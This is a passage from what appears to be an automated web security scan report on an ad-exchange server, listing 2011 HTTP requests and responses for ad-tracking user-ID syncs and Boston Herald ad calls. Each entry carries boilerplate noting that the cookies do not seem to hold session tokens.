HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly Location: .c.7 Date: Fri, 28 Jan 2011 16:46:21 GMT Content-Length: 0 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb
Response
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly Location: http://pixel.rubiconproject.com/tap.php?v=4894&nid=1986&put=4760492999213801733&expires=30 Date: Fri, 28 Jan 2011 14:48:49 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getuidu?http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=$UID HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=3899286550461626968&nu=n&sp=n Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:$78zsR5OeIufidQD2]*](K9'=5f>*@; sess=1
Response
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly Location: http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=4760492999213801733 Date: Fri, 28 Jan 2011 17:37:32 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mapuid?member=364&user=914803576615380,rcHW800iZiMAAocf HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Fri, 28 Jan 2011 14:14:50 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-84139438_1296253138%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D47567%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.7543001882731915%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb458625=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb734371=5_[r^208WMM2x@N!@@-#c5UK9?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP-1DpNaIIcFyBWHfHSmrEEKCcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEQgcBAgUCAAIAAAAAJiN9fwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265346%29%3Buf%28%27r%27%2C+116344%2C+1296265346%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:26 GMT Content-Length: 832
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D4&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.5569272553548217%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb918937=5_[r^208WMM2x@N!@@-#at>$5?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP6yB-4ble5ZuBWHfHSmrEEJ-cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE-gYBAgUCAAIAAAAAZSS2ugAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265342%29%3Buf%28%27r%27%2C+116344%2C+1296265342%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:22 GMT Content-Length: 521
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61892947_1296253385%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D54892%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6713631898164749%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb322141=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb130500=5_[r^208WMM2x@N!@@-#cn5^<?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP1oKi6Mn921PBWHfHSmrEEKEcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEHAcBAgUCAAIAAAAA6CFsHQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265348%29%3Buf%28%27r%27%2C+116344%2C+1296265348%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:28 GMT Content-Length: 832
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
